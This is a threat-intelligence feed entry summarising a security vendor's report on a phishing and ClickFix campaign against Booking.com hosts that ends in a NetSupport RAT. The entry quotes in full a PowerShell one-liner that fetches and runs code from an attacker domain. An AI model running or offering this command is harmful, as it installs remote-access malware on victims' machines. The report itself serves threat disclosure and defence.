logo

Reviews used to attack Booking.com hosts with phishing and malware · Blog · Sublime Security

ID: ea722ab9-7f03-5e33-a08c-bf78e2f0ccdc

STIX ID: report--ea722ab9-7f03-5e33-a08c-bf78e2f0ccdc

Feed Name: Sublime Security Blog

Threat Score
70/100

Date Published: 2026-06-04

Date Updated: 2026-07-22

...
...

Sublime observed an active campaign targeting Booking.com hosts that uses review-themed phishing emails to deliver credential-harvesting pages and a ClickFix-style malware flow. Attackers use link spoofing and redirect chains to fake Booking.com links, deploy a clipboard-based PowerShell downloader (powershell -wi mi -EP B -c iex(irm apy-morpho.org)), and fetch a payload that installs a maliciously configured NetSupport RAT with persistence and C2 endpoints; the report includes domains, scripts, sample payloads, and detection signals.

Your team is not currently subscribed to this feed. You must subscribe to it in order to see this post.